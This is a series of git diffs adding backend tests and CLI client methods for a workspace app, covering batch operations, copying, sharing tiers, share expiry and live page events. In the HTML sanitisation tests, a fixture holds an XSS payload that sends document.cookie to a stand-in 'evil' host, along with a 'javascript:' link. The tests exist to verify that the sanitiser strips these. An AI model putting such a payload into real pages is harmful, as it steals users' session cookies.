+        "INSERT INTO workspace_members (workspace_id, user_id, role) VALUES ($1, $2, 'owner')",
+        ws_id,
+        user_id,
+    )
+    return ws_id, user_id
+
+
+async def _make_file(pool, ws_id, user_id, folder_id=None):
+    fid = uuid4()
+    await pool.execute(
+        "INSERT INTO files (id, workspace_id, name, content_type, size_bytes, storage_key, "
+        "uploaded_by, folder_id) VALUES ($1, $2, $3, 'text/plain', 1, $4, $5, $6)",
+        fid,
+        ws_id,
+        f"f_{fid.hex[:6]}",
+        f"key_{fid.hex[:6]}",
+        user_id,
+        folder_id,
+    )
+    return fid
+
+
+@pytest.mark.asyncio
+async def test_batch_move_partial_success(workspace, _db_pool):
+    """A move where one item belongs to another workspace: the good items move,
+    the bad one comes back as an error — the batch isn't all-or-nothing."""
+    ws_id, user_id = workspace
+    folder = await files_tree_service.create_folder(ws_id, "Dest", user_id)
+    page = await files_tree_service.create_page(workspace_id=ws_id, name="P", created_by=user_id)
+    file_id = await _make_file(_db_pool, ws_id, user_id)
+    stranger_page = uuid4()  # never inserted → not found
+
+    result = await batch_service.batch_move(
+        ws_id,
+        user_id,
+        [
+            {"object_type": "page", "object_id": str(page["id"])},
+            {"object_type": "file", "object_id": str(file_id)},
+            {"object_type": "page", "object_id": str(stranger_page)},
+        ],
+        target_folder_id=folder["id"],
+    )
+
+    assert {s["object_id"] for s in result["succeeded"]} == {str(page["id"]), str(file_id)}
+    assert [e["object_id"] for e in result["errors"]] == [str(stranger_page)]
+    # The good items really landed in the folder.
+    assert (
+        await _db_pool.fetchval("SELECT folder_id FROM pages WHERE id = $1", page["id"])
+    ) == folder["id"]
+    assert (
+        await _db_pool.fetchval("SELECT folder_id FROM files WHERE id = $1", file_id)
+    ) == folder["id"]
+
+
+@pytest.mark.asyncio
+async def test_batch_delete_and_restore_pages_and_files(workspace, _db_pool):
+    ws_id, user_id = workspace
+    page = await files_tree_service.create_page(workspace_id=ws_id, name="P2", created_by=user_id)
+    file_id = await _make_file(_db_pool, ws_id, user_id)
+    items = [
+        {"object_type": "page", "object_id": str(page["id"])},
+        {"object_type": "file", "object_id": str(file_id)},
+    ]
+
+    deleted = await batch_service.batch_delete(ws_id, user_id, items)
+    assert len(deleted["succeeded"]) == 2 and not deleted["errors"]
+    assert await _db_pool.fetchval("SELECT deleted_at FROM pages WHERE id = $1", page["id"])
+    assert await _db_pool.fetchval("SELECT deleted_at FROM files WHERE id = $1", file_id)
+
+    restored = await batch_service.batch_restore(ws_id, user_id, items)
+    assert len(restored["succeeded"]) == 2 and not restored["errors"]
+    assert await _db_pool.fetchval("SELECT deleted_at FROM pages WHERE id = $1", page["id"]) is None
+
+
+@pytest.mark.asyncio
+async def test_batch_delete_rejects_unsupported_type(workspace, _db_pool):
+    """Folders/tables hard-delete, so batch delete refuses them (fail loud per
+    item) rather than silently wiping a subtree."""
+    ws_id, user_id = workspace
+    folder = await files_tree_service.create_folder(ws_id, "Keep", user_id)
+    result = await batch_service.batch_delete(
+        ws_id, user_id, [{"object_type": "folder", "object_id": str(folder["id"])}]
+    )
+    assert not result["succeeded"]
+    assert "folder" in result["errors"][0]["reason"]
+    # Folder still there.
+    assert await _db_pool.fetchval("SELECT 1 FROM folders WHERE id = $1", folder["id"])
+
+
+@pytest.mark.asyncio
+async def test_batch_move_rejects_cross_workspace_item(workspace, _db_pool):
+    """An item in another workspace must error, not move — even though the caller
+    owns the request workspace."""
+    ws_id, user_id = workspace
+    other_ws = uuid4()
+    await _db_pool.execute(
+        "INSERT INTO workspaces (id, name, creator_id, invite_code) VALUES ($1, $2, $3, $4)",
+        other_ws,
+        f"ws_{other_ws.hex[:6]}",
+        user_id,
+        other_ws.hex[:12],
+    )
+    other_page = await files_tree_service.create_page(
+        workspace_id=other_ws, name="Other", created_by=user_id
+    )
+    result = await batch_service.batch_move(
+        ws_id, user_id, [{"object_type": "page", "object_id": str(other_page["id"])}], move_to_root=True
+    )
+    assert not result["succeeded"]
+    assert result["errors"][0]["reason"] == "not found"

--- a/backend/tests/test_copy.py
+++ b/backend/tests/test_copy.py
@@ -81,9 +81,7 @@ async def test_copy_folder_is_deep(workspace, _db_pool):
         "SELECT id, name FROM folders WHERE parent_folder_id = $1", copy["id"]
     )
     assert new_sub["name"] == "Sub"
-    nested = await _db_pool.fetchval(
-        "SELECT name FROM pages WHERE folder_id = $1", new_sub["id"]
-    )
+    nested = await _db_pool.fetchval("SELECT name FROM pages WHERE folder_id = $1", new_sub["id"])
     assert nested == "Nested page"
     new_table = await _db_pool.fetchrow(
         "SELECT id, name FROM tables WHERE folder_id = $1", copy["id"]

--- a/backend/tests/test_copy.py
+++ b/backend/tests/test_copy.py
@@ -1,0 +1,115 @@
+"""Copy / duplicate: pages, deep folders, and agent-facing copy tools.
+
+File copy needs S3, which the test environment doesn't configure, so these
+exercise pages/folders/tables only (the file path is covered by the S3 guard in
+the router)."""
+
+from __future__ import annotations
+
+import json
+from uuid import uuid4
+
+import pytest
+import pytest_asyncio
+
+from backend.services import agent_runtime, files_tree_service, table_service
+
+
+@pytest_asyncio.fixture
+async def workspace(_db_pool):
+    user_id = uuid4()
+    ws_id = uuid4()
+    await _db_pool.execute(
+        "INSERT INTO users (id, name, display_name) VALUES ($1, $2, $2)",
+        user_id,
+        f"u_{user_id.hex[:6]}",
+    )
+    await _db_pool.execute(
+        "INSERT INTO workspaces (id, name, creator_id, invite_code) VALUES ($1, $2, $3, $4)",
+        ws_id,
+        f"ws_{ws_id.hex[:6]}",
+        user_id,
+        ws_id.hex[:12],
+    )
+    await _db_pool.execute(
+        "INSERT INTO workspace_members (workspace_id, user_id, role) VALUES ($1, $2, 'owner')",
+        ws_id,
+        user_id,
+    )
+    return ws_id, user_id
+
+
+@pytest.mark.asyncio
+async def test_copy_page_uses_copy_of_name_and_increments(workspace, _db_pool):
+    ws_id, user_id = workspace
+    src = await files_tree_service.create_page(
+        workspace_id=ws_id, name="Spec", created_by=user_id, content="body"
+    )
+    first = await files_tree_service.copy_page(src["id"], ws_id, user_id)
+    second = await files_tree_service.copy_page(src["id"], ws_id, user_id)
+    assert first["name"] == "Copy of Spec"
+    assert second["name"] == "Copy of Spec (2)"  # collision → numbered
+    assert first["content_markdown"] == "body"
+    assert first["id"] != src["id"]
+
+
+@pytest.mark.asyncio
+async def test_copy_folder_is_deep(workspace, _db_pool):
+    ws_id, user_id = workspace
+    root = await files_tree_service.create_folder(ws_id, "Project", user_id)
+    sub = await files_tree_service.create_folder(ws_id, "Sub", user_id, parent_folder_id=root["id"])
+    await files_tree_service.create_page(
+        workspace_id=ws_id, name="Top page", created_by=user_id, folder_id=root["id"], content="t"
+    )
+    await files_tree_service.create_page(
+        workspace_id=ws_id, name="Nested page", created_by=user_id, folder_id=sub["id"], content="n"
+    )
+    table = await table_service.create_table(
+        ws_id, "Data", "", [{"name": "Col", "type": "text"}], user_id, folder_id=root["id"]
+    )
+    await table_service.create_row(table["id"], {"Col": "v"}, user_id)
+
+    copy = await files_tree_service.copy_folder(root["id"], ws_id, user_id)
+    assert copy["name"] == "Copy of Project"
+
+    # New top folder has the page + table + the subfolder; subfolder has its page.
+    new_pages = await _db_pool.fetch(
+        "SELECT name FROM pages WHERE folder_id = $1 ORDER BY name", copy["id"]
+    )
+    assert [p["name"] for p in new_pages] == ["Top page"]  # descendants keep names
+    new_sub = await _db_pool.fetchrow(
+        "SELECT id, name FROM folders WHERE parent_folder_id = $1", copy["id"]
+    )
+    assert new_sub["name"] == "Sub"
+    nested = await _db_pool.fetchval(
+        "SELECT name FROM pages WHERE folder_id = $1", new_sub["id"]
+    )
+    assert nested == "Nested page"
+    new_table = await _db_pool.fetchrow(
+        "SELECT id, name FROM tables WHERE folder_id = $1", copy["id"]
+    )
+    assert new_table["name"] == "Data"
+    row_count = await _db_pool.fetchval(
+        "SELECT count(*) FROM table_rows WHERE table_id = $1", new_table["id"]
+    )
+    assert row_count == 1  # rows copied, column ids preserved
+
+
+@pytest.mark.asyncio
+async def test_agent_copy_page_tool(workspace, _db_pool):
+    ws_id, user_id = workspace
+    src = await files_tree_service.create_page(
+        workspace_id=ws_id, name="Doc", created_by=user_id, content="x"
+    )
+    workspace_token = agent_runtime._workspace_ctx.set(ws_id)
+    user_token = agent_runtime._user_ctx.set(user_id)
+    try:
+        out = json.loads(
+            (await agent_runtime._copy_page.handler({"page_id": str(src["id"])}))["content"][0][
+                "text"
+            ]
+        )
+    finally:
+        agent_runtime._user_ctx.reset(user_token)
+        agent_runtime._workspace_ctx.reset(workspace_token)
+    assert out["name"] == "Copy of Doc"

--- a/backend/tests/test_html_sanitize.py
+++ b/backend/tests/test_html_sanitize.py
@@ -57,9 +57,7 @@ async def test_create_page_strips_scripts_keeps_structure(workspace, _db_pool):
         content_type="html",
         content_html=hostile,
     )
-    stored = await _db_pool.fetchval(
-        "SELECT content_html FROM pages WHERE id = $1", page["id"]
-    )
+    stored = await _db_pool.fetchval("SELECT content_html FROM pages WHERE id = $1", page["id"])
     # Hostile bits gone.
     assert "<script" not in stored and "fetch(" not in stored
     assert "javascript:" not in stored
@@ -105,8 +103,6 @@ async def test_update_page_sanitizes_html(workspace, _db_pool):
         updated_by=user_id,
         content_html="<p>updated</p><script>evil()</script>",
     )
-    stored = await _db_pool.fetchval(
-        "SELECT content_html FROM pages WHERE id = $1", page["id"]
-    )
+    stored = await _db_pool.fetchval("SELECT content_html FROM pages WHERE id = $1", page["id"])
     assert "updated" in stored
     assert "<script" not in stored and "evil()" not in stored

--- a/backend/tests/test_html_sanitize.py
+++ b/backend/tests/test_html_sanitize.py
@@ -1,0 +1,112 @@
+"""HTML pages are author-controlled and rendered for public viewers in a
+sandboxed iframe with allow-scripts. We sanitize on write so a page can't ship
+hostile JS. These tests pin that contract at the service boundary."""
+
+from __future__ import annotations
+
+import hashlib
+from uuid import uuid4
+
+import pytest
+import pytest_asyncio
+
+from backend.services import files_tree_service
+
+
+@pytest_asyncio.fixture
+async def workspace(_db_pool):
+    user_id = uuid4()
+    ws_id = uuid4()
+    await _db_pool.execute(
+        "INSERT INTO users (id, name, display_name) VALUES ($1, $2, $2)",
+        user_id,
+        f"u_{user_id.hex[:6]}",
+    )
+    await _db_pool.execute(
+        "INSERT INTO workspaces (id, name, creator_id, invite_code) VALUES ($1, $2, $3, $4)",
+        ws_id,
+        f"ws_{ws_id.hex[:6]}",
+        user_id,
+        ws_id.hex[:12],
+    )
+    await _db_pool.execute(
+        "INSERT INTO workspace_members (workspace_id, user_id, role) VALUES ($1, $2, 'owner')",
+        ws_id,
+        user_id,
+    )
+    return ws_id, user_id
+
+
+@pytest.mark.asyncio
+async def test_create_page_strips_scripts_keeps_structure(workspace, _db_pool):
+    ws_id, user_id = workspace
+    hostile = (
+        '<section class="slide" data-slide="1">'
+        "<h1>Deck</h1>"
+        '<span data-comment-id="c1">noted</span>'
+        '<img src="data:image/png;base64,AAAA">'
+        '<a href="javascript:steal()">x</a>'
+        "<style>.slide{color:red}</style>"
+        "<script>fetch('//evil/'+document.cookie)</script>"
+        "</section>"
+    )
+    page = await files_tree_service.create_page(
+        workspace_id=ws_id,
+        name="Deck",
+        created_by=user_id,
+        content_type="html",
+        content_html=hostile,
+    )
+    stored = await _db_pool.fetchval(
+        "SELECT content_html FROM pages WHERE id = $1", page["id"]
+    )
+    # Hostile bits gone.
+    assert "<script" not in stored and "fetch(" not in stored
+    assert "javascript:" not in stored
+    # Legitimate structure, styling, comment anchor, and inline image survive.
+    assert 'data-slide="1"' in stored and 'class="slide"' in stored
+    assert "<style>.slide{color:red}</style>" in stored
+    assert 'data-comment-id="c1"' in stored
+    assert "data:image/png;base64,AAAA" in stored
+
+
+@pytest.mark.asyncio
+async def test_content_hash_matches_sanitized_bytes(workspace, _db_pool):
+    """The stored content_hash must be computed from the sanitized body, so the
+    optimistic-concurrency guard on the next edit doesn't spuriously conflict."""
+    ws_id, user_id = workspace
+    page = await files_tree_service.create_page(
+        workspace_id=ws_id,
+        name="Hashed",
+        created_by=user_id,
+        content_type="html",
+        content_html="<p>ok</p><script>bad()</script>",
+    )
+    row = await _db_pool.fetchrow(
+        "SELECT content_html, content_hash FROM pages WHERE id = $1", page["id"]
+    )
+    active = files_tree_service._active_content("html", "", row["content_html"])
+    assert row["content_hash"] == hashlib.sha256(active.encode()).hexdigest()
+
+
+@pytest.mark.asyncio
+async def test_update_page_sanitizes_html(workspace, _db_pool):
+    ws_id, user_id = workspace
+    page = await files_tree_service.create_page(
+        workspace_id=ws_id,
+        name="Live",
+        created_by=user_id,
+        content_type="html",
+        content_html="<p>clean</p>",
+    )
+    await files_tree_service.update_page(
+        page_id=page["id"],
+        workspace_id=ws_id,
+        updated_by=user_id,
+        content_html="<p>updated</p><script>evil()</script>",
+    )
+    stored = await _db_pool.fetchval(
+        "SELECT content_html FROM pages WHERE id = $1", page["id"]
+    )
+    assert "updated" in stored
+    assert "<script" not in stored and "evil()" not in stored

--- a/backend/tests/test_page_comments.py
+++ b/backend/tests/test_page_comments.py
@@ -57,8 +57,12 @@ async def test_read_share_cannot_comment_but_comment_share_can(client: AsyncClie
     # Read-only share: friend can read threads, but commenting 404s.
     await client.post(
         "/api/v1/share",
-        json={"object_type": "page", "object_id": page_id, "email": friend_email,
-              "permission": "read"},
+        json={
+            "object_type": "page",
+            "object_id": page_id,
+            "email": friend_email,
+            "permission": "read",
+        },
         headers=owner,
     )
     list_resp = await client.get(
@@ -75,8 +79,12 @@ async def test_read_share_cannot_comment_but_comment_share_can(client: AsyncClie
     # Upgrade to a comment share: now the post succeeds.
     await client.post(
         "/api/v1/share",
-        json={"object_type": "page", "object_id": page_id, "email": friend_email,
-              "permission": "comment"},
+        json={
+            "object_type": "page",
+            "object_id": page_id,
+            "email": friend_email,
+            "permission": "comment",
+        },
         headers=owner,
     )
     allowed = await client.post(

--- a/backend/tests/test_page_comments.py
+++ b/backend/tests/test_page_comments.py
@@ -31,6 +31,62 @@ async def _setup_page(client: AsyncClient, headers: dict) -> tuple[str, str]:
     return ws["id"], page["id"]
 
 
+async def _register_with_email(client: AsyncClient, email: str) -> tuple[str, str]:
+    resp = await client.post(
+        "/api/v1/users/register",
+        json={"name": unique_name(), "password": "securepassword1", "email": email},
+    )
+    assert resp.status_code == 201
+    return resp.json()["api_key"]
+
+
+@pytest.mark.asyncio
+async def test_read_share_cannot_comment_but_comment_share_can(client: AsyncClient) -> None:
+    """The comment tier: a read-only share can view threads but not post; a
+    'comment' share can post. Exercised across the trust boundary (a sharee who
+    is NOT a workspace member)."""
+    owner_key = await _register(client)
+    owner = _auth(owner_key)
+    friend_email = f"{unique_name()}@example.com"
+    friend_key = await _register_with_email(client, friend_email)
+    friend = _auth(friend_key)
+    ws_id, page_id = await _setup_page(client, owner)
+
+    comment_body = {"quoted_text": "Hello", "prefix": "", "suffix": "", "body": "hi"}
+
+    # Read-only share: friend can read threads, but commenting 404s.
+    await client.post(
+        "/api/v1/share",
+        json={"object_type": "page", "object_id": page_id, "email": friend_email,
+              "permission": "read"},
+        headers=owner,
+    )
+    list_resp = await client.get(
+        f"/api/v1/workspaces/{ws_id}/pages/{page_id}/comments/threads", headers=friend
+    )
+    assert list_resp.status_code == 200
+    denied = await client.post(
+        f"/api/v1/workspaces/{ws_id}/pages/{page_id}/comments/threads",
+        json=comment_body,
+        headers=friend,
+    )
+    assert denied.status_code == 404
+
+    # Upgrade to a comment share: now the post succeeds.
+    await client.post(
+        "/api/v1/share",
+        json={"object_type": "page", "object_id": page_id, "email": friend_email,
+              "permission": "comment"},
+        headers=owner,
+    )
+    allowed = await client.post(
+        f"/api/v1/workspaces/{ws_id}/pages/{page_id}/comments/threads",
+        json=comment_body,
+        headers=friend,
+    )
+    assert allowed.status_code == 201
+
+
 @pytest.mark.asyncio
 async def test_create_thread_with_first_message(client: AsyncClient) -> None:
     api_key = await _register(client)

--- a/backend/tests/test_page_events.py
+++ b/backend/tests/test_page_events.py
@@ -100,9 +100,7 @@ async def test_collab_projection_save_does_not_notify(workspace, _db_pool):
     )
     queue = page_events.subscribe(ws_id)
     try:
-        await files_tree_service.update_page(
-            page["id"], ws_id, user_id, content="b", notify=False
-        )
+        await files_tree_service.update_page(page["id"], ws_id, user_id, content="b", notify=False)
         await asyncio.sleep(0.05)
         empty = queue.empty()
     finally:

--- a/backend/tests/test_page_events.py
+++ b/backend/tests/test_page_events.py
@@ -1,0 +1,115 @@
+"""Live page updates: the pub/sub fan-out and update_page's notify behavior
+(publish an event + invalidate stale collab state on external writes)."""
+
+from __future__ import annotations
+
+import asyncio
+from uuid import uuid4
+
+import pytest
+import pytest_asyncio
+
+from backend.services import files_tree_service, page_events
+
+
+@pytest_asyncio.fixture
+async def workspace(_db_pool):
+    user_id = uuid4()
+    ws_id = uuid4()
+    await _db_pool.execute(
+        "INSERT INTO users (id, name, display_name) VALUES ($1, $2, $2)",
+        user_id,
+        f"u_{user_id.hex[:6]}",
+    )
+    await _db_pool.execute(
+        "INSERT INTO workspaces (id, name, creator_id, invite_code) VALUES ($1, $2, $3, $4)",
+        ws_id,
+        f"ws_{ws_id.hex[:6]}",
+        user_id,
+        ws_id.hex[:12],
+    )
+    await _db_pool.execute(
+        "INSERT INTO workspace_members (workspace_id, user_id, role) VALUES ($1, $2, 'owner')",
+        ws_id,
+        user_id,
+    )
+    return ws_id, user_id
+
+
+def test_pubsub_delivers_then_stops_after_unsubscribe():
+    ws = uuid4()
+    page = uuid4()
+    queue = page_events.subscribe(ws)
+    page_events.publish_page_update(ws, page, "hash1", "Agent")
+    event = queue.get_nowait()
+    assert event == {
+        "type": "page.updated",
+        "page_id": str(page),
+        "content_hash": "hash1",
+        "agent_name": "Agent",
+    }
+    page_events.unsubscribe(ws, queue)
+    page_events.publish_page_update(ws, page, "hash2", None)  # no subscribers; no error
+    assert queue.empty()
+
+
+@pytest.mark.asyncio
+async def test_update_page_notifies_and_invalidates_collab(workspace, _db_pool):
+    ws_id, user_id = workspace
+    page = await files_tree_service.create_page(
+        workspace_id=ws_id, name="Live", created_by=user_id, content="v1"
+    )
+    # Simulate a persisted collab doc (as if the page had been opened in the editor).
+    await _db_pool.execute(
+        "INSERT INTO page_collab_documents (page_id, workspace_id, yjs_state) VALUES ($1, $2, $3)",
+        page["id"],
+        ws_id,
+        b"\x00",
+    )
+    queue = page_events.subscribe(ws_id)
+    try:
+        await files_tree_service.update_page(
+            page["id"], ws_id, user_id, content="v2", edit_agent_name="Stash Agent"
+        )
+        event = await asyncio.wait_for(queue.get(), timeout=1)
+    finally:
+        page_events.unsubscribe(ws_id, queue)
+
+    assert event["page_id"] == str(page["id"])
+    assert event["agent_name"] == "Stash Agent"
+    # Stale collab state was dropped so a reopened editor reloads fresh content.
+    remaining = await _db_pool.fetchval(
+        "SELECT count(*) FROM page_collab_documents WHERE page_id = $1", page["id"]
+    )
+    assert remaining == 0
+
+
+@pytest.mark.asyncio
+async def test_collab_projection_save_does_not_notify(workspace, _db_pool):
+    """The editor's own Yjs->DB projection (notify=False) must not broadcast or
+    wipe collab state — that would fight the live editor."""
+    ws_id, user_id = workspace
+    page = await files_tree_service.create_page(
+        workspace_id=ws_id, name="Editing", created_by=user_id, content="a"
+    )
+    await _db_pool.execute(
+        "INSERT INTO page_collab_documents (page_id, workspace_id, yjs_state) VALUES ($1, $2, $3)",
+        page["id"],
+        ws_id,
+        b"\x00",
+    )
+    queue = page_events.subscribe(ws_id)
+    try:
+        await files_tree_service.update_page(
+            page["id"], ws_id, user_id, content="b", notify=False
+        )
+        await asyncio.sleep(0.05)
+        empty = queue.empty()
+    finally:
+        page_events.unsubscribe(ws_id, queue)
+
+    assert empty  # no broadcast
+    kept = await _db_pool.fetchval(
+        "SELECT count(*) FROM page_collab_documents WHERE page_id = $1", page["id"]
+    )
+    assert kept == 1  # collab state preserved

--- a/backend/tests/test_permissions.py
+++ b/backend/tests/test_permissions.py
@@ -6,7 +6,7 @@ import pytest
 from httpx import AsyncClient
 
 from backend.models import CartridgeItem
-from backend.services import cartridge_service, permission_service
+from backend.services import cartridge_service, permission_service, share_service
 
 from .conftest import unique_name
 
@@ -219,7 +219,7 @@ async def test_owner_has_read_and_write(pool):
     ws = await _make_workspace(pool, owner)
     page = await _make_page(pool, ws, owner)
     assert await permission_service.check_access("page", page, owner)
-    assert await permission_service.check_access("page", page, owner, require_write=True)
+    assert await permission_service.check_access("page", page, owner, require="write")
 
 
 @pytest.mark.asyncio
@@ -240,7 +240,7 @@ async def test_user_share_grants_read_not_write(pool):
     page = await _make_page(pool, ws, owner)
     await _share(pool, ws, "page", page, friend, "read", by=owner)
     assert await permission_service.check_access("page", page, friend)
-    assert not await permission_service.check_access("page", page, friend, require_write=True)
+    assert not await permission_service.check_access("page", page, friend, require="write")
 
 
 @pytest.mark.asyncio
@@ -250,7 +250,67 @@ async def test_user_write_share_grants_write(pool):
     ws = await _make_workspace(pool, owner)
     page = await _make_page(pool, ws, owner)
     await _share(pool, ws, "page", page, friend, "write", by=owner)
-    assert await permission_service.check_access("page", page, friend, require_write=True)
+    assert await permission_service.check_access("page", page, friend, require="write")
+
+
+@pytest.mark.asyncio
+async def test_comment_tier_sits_between_read_and_write(pool):
+    """read < comment < write: a read share can't comment; a comment share can
+    comment but not write; a write share can do everything."""
+    owner = await _make_user(pool)
+    reader = await _make_user(pool)
+    commenter = await _make_user(pool)
+    ws = await _make_workspace(pool, owner)
+    page = await _make_page(pool, ws, owner)
+    await _share(pool, ws, "page", page, reader, "read", by=owner)
+    await _share(pool, ws, "page", page, commenter, "comment", by=owner)
+
+    # read share: can read, cannot comment, cannot write.
+    assert await permission_service.check_access("page", page, reader)
+    assert not await permission_service.check_access("page", page, reader, require="comment")
+    assert not await permission_service.check_access("page", page, reader, require="write")
+    # comment share: can read + comment, not write.
+    assert await permission_service.check_access("page", page, commenter, require="comment")
+    assert not await permission_service.check_access("page", page, commenter, require="write")
+
+
+@pytest.mark.asyncio
+async def test_expired_share_grants_nothing(pool):
+    owner = await _make_user(pool)
+    friend = await _make_user(pool)
+    ws = await _make_workspace(pool, owner)
+    page = await _make_page(pool, ws, owner)
+    await pool.execute(
+        "INSERT INTO shares (workspace_id, object_type, object_id, principal_type, "
+        "principal_id, permission, created_by, expires_at) "
+        "VALUES ($1,'page',$2,'user',$3,'write',$4, now() - interval '1 hour')",
+        ws,
+        page,
+        friend,
+        owner,
+    )
+    # Expired → no access, and absent from the readable predicate / with-me list.
+    assert not await permission_service.check_access("page", page, friend)
+    with_me = await share_service.list_shared_with_user(friend)
+    assert all(item["object_id"] != str(page) for item in with_me)
+
+
+@pytest.mark.asyncio
+async def test_future_expiry_still_grants(pool):
+    owner = await _make_user(pool)
+    friend = await _make_user(pool)
+    ws = await _make_workspace(pool, owner)
+    page = await _make_page(pool, ws, owner)
+    await pool.execute(
+        "INSERT INTO shares (workspace_id, object_type, object_id, principal_type, "
+        "principal_id, permission, created_by, expires_at) "
+        "VALUES ($1,'page',$2,'user',$3,'read',$4, now() + interval '1 day')",
+        ws,
+        page,
+        friend,
+        owner,
+    )
+    assert await permission_service.check_access("page", page, friend)
 
 
 @pytest.mark.asyncio
@@ -286,7 +346,7 @@ async def test_table_folder_share_cascades_and_write_inherits(pool):
     await _share(pool, ws, "folder", folder, friend, "read", by=owner)
     assert await permission_service.check_access("table", table, friend)
     # Read share is not a write grant, and the root table is outside the folder.
-    assert not await permission_service.check_access("table", table, friend, require_write=True)
+    assert not await permission_service.check_access("table", table, friend, require="write")
     assert not await permission_service.check_access("table", root_table, friend)
 
     # Upgrading the folder share to write cascades write to the table.
@@ -296,7 +356,7 @@ async def test_table_folder_share_cascades_and_write_inherits(pool):
         folder,
         friend,
     )
-    assert await permission_service.check_access("table", table, friend, require_write=True)
+    assert await permission_service.check_access("table", table, friend, require="write")
 
 
 @pytest.mark.asyncio
@@ -308,7 +368,7 @@ async def test_public_cartridge_grants_read_only(pool):
     await _make_cartridge(ws, owner, "public", "page", page)
     assert await permission_service.check_access("page", page, stranger)
     assert await permission_service.check_access("page", page, None)
-    assert not await permission_service.check_access("page", page, stranger, require_write=True)
+    assert not await permission_service.check_access("page", page, stranger, require="write")
 
 
 @pytest.mark.asyncio
@@ -321,7 +381,7 @@ async def test_private_cartridge_member_reads_contents_not_write(pool):
     cartridge = await _make_cartridge(ws, owner, "private", "page", page)
     await _add_cartridge_member(pool, cartridge["id"], member, owner, "read")
     assert await permission_service.check_access("page", page, member)
-    assert not await permission_service.check_access("page", page, member, require_write=True)
+    assert not await permission_service.check_access("page", page, member, require="write")
     assert not await permission_service.check_access("page", page, stranger)
 
 

--- a/cli/client.py
+++ b/cli/client.py
@@ -597,6 +597,28 @@ class CartridgeClient:
             f"/api/v1/workspaces/{workspace_id}/files/{file_id}/copy", json=body
         )
 
+    # --- Batch ops (best-effort move/delete/restore over many items) ---
+
+    def batch_move(
+        self,
+        workspace_id: str,
+        items: list[dict],
+        target_folder_id: str | None = None,
+        move_to_root: bool = False,
+    ) -> dict:
+        body: dict = {"items": items, "move_to_root": move_to_root}
+        if target_folder_id:
+            body["target_folder_id"] = target_folder_id
+        return self._post(f"/api/v1/workspaces/{workspace_id}/batch/move", json=body)
+
+    def batch_delete(self, workspace_id: str, items: list[dict]) -> dict:
+        return self._post(f"/api/v1/workspaces/{workspace_id}/batch/delete", json={"items": items})
+
+    def batch_restore(self, workspace_id: str, items: list[dict]) -> dict:
+        return self._post(
+            f"/api/v1/workspaces/{workspace_id}/batch/restore", json={"items": items}
+        )
+
     def restore_ws_file(self, workspace_id: str, file_id: str) -> None:
         self._post(f"/api/v1/workspaces/{workspace_id}/files/{file_id}/restore")
 

--- a/cli/client.py
+++ b/cli/client.py
@@ -369,9 +369,7 @@ class CartridgeClient:
         self, workspace_id: str, folder_id: str, target_folder_id: str | None = None
     ) -> dict:
         body = {"target_folder_id": target_folder_id} if target_folder_id else {}
-        return self._post(
-            f"/api/v1/workspaces/{workspace_id}/folders/{folder_id}/copy", json=body
-        )
+        return self._post(f"/api/v1/workspaces/{workspace_id}/folders/{folder_id}/copy", json=body)
 
     def update_folder(
         self,
@@ -449,9 +447,7 @@ class CartridgeClient:
         self, workspace_id: str, page_id: str, target_folder_id: str | None = None
     ) -> dict:
         body = {"target_folder_id": target_folder_id} if target_folder_id else {}
-        return self._post(
-            f"/api/v1/workspaces/{workspace_id}/pages/{page_id}/copy", json=body
-        )
+        return self._post(f"/api/v1/workspaces/{workspace_id}/pages/{page_id}/copy", json=body)
 
     # --- Session events ---
 
@@ -593,9 +589,7 @@ class CartridgeClient:
         self, workspace_id: str, file_id: str, target_folder_id: str | None = None
     ) -> dict:
         body = {"target_folder_id": target_folder_id} if target_folder_id else {}
-        return self._post(
-            f"/api/v1/workspaces/{workspace_id}/files/{file_id}/copy", json=body
-        )
+        return self._post(f"/api/v1/workspaces/{workspace_id}/files/{file_id}/copy", json=body)
 
     # --- Batch ops (best-effort move/delete/restore over many items) ---
 
@@ -615,9 +609,7 @@ class CartridgeClient:
         return self._post(f"/api/v1/workspaces/{workspace_id}/batch/delete", json={"items": items})
 
     def batch_restore(self, workspace_id: str, items: list[dict]) -> dict:
-        return self._post(
-            f"/api/v1/workspaces/{workspace_id}/batch/restore", json={"items": items}
-        )
+        return self._post(f"/api/v1/workspaces/{workspace_id}/batch/restore", json={"items": items})
 
     def restore_ws_file(self, workspace_id: str, file_id: str) -> None:
         self._post(f"/api/v1/workspaces/{workspace_id}/files/{file_id}/restore")

--- a/cli/client.py
+++ b/cli/client.py
@@ -360,6 +360,14 @@ class CartridgeClient:
     def delete_folder(self, workspace_id: str, folder_id: str) -> None:
         self._delete(f"/api/v1/workspaces/{workspace_id}/folders/{folder_id}")
 
+    def copy_folder(
+        self, workspace_id: str, folder_id: str, target_folder_id: str | None = None
+    ) -> dict:
+        body = {"target_folder_id": target_folder_id} if target_folder_id else {}
+        return self._post(
+            f"/api/v1/workspaces/{workspace_id}/folders/{folder_id}/copy", json=body
+        )
+
     def update_folder(
         self,
         workspace_id: str,
@@ -431,6 +439,14 @@ class CartridgeClient:
 
     def purge_page(self, workspace_id: str, page_id: str) -> None:
         self._delete(f"/api/v1/workspaces/{workspace_id}/pages/{page_id}/purge")
+
+    def copy_page(
+        self, workspace_id: str, page_id: str, target_folder_id: str | None = None
+    ) -> dict:
+        body = {"target_folder_id": target_folder_id} if target_folder_id else {}
+        return self._post(
+            f"/api/v1/workspaces/{workspace_id}/pages/{page_id}/copy", json=body
+        )
 
     # --- Session events ---
 
@@ -567,6 +583,14 @@ class CartridgeClient:
 
     def delete_ws_file(self, workspace_id: str, file_id: str) -> None:
         self._delete(f"/api/v1/workspaces/{workspace_id}/files/{file_id}")
+
+    def copy_ws_file(
+        self, workspace_id: str, file_id: str, target_folder_id: str | None = None
+    ) -> dict:
+        body = {"target_folder_id": target_folder_id} if target_folder_id else {}
+        return self._post(
+            f"/api/v1/workspaces/{workspace_id}/files/{file_id}/copy", json=body
+        )
 
     def restore_ws_file(self, workspace_id: str, file_id: str) -> None:
         self._post(f"/api/v1/workspaces/{workspace_id}/files/{file_id}/restore")

--- a/cli/client.py
+++ b/cli/client.py
@@ -256,17 +256,22 @@ class CartridgeClient:
     # --- Object sharing (grant a person access to a folder/file/session by email) ---
 
     def share_object(
-        self, object_type: str, object_id: str, email: str, permission: str = "read"
+        self,
+        object_type: str,
+        object_id: str,
+        email: str,
+        permission: str = "read",
+        expires_at: str | None = None,
     ) -> dict:
-        return self._post(
-            "/api/v1/share",
-            json={
-                "object_type": object_type,
-                "object_id": object_id,
-                "email": email,
-                "permission": permission,
-            },
-        )
+        body = {
+            "object_type": object_type,
+            "object_id": object_id,
+            "email": email,
+            "permission": permission,
+        }
+        if expires_at:
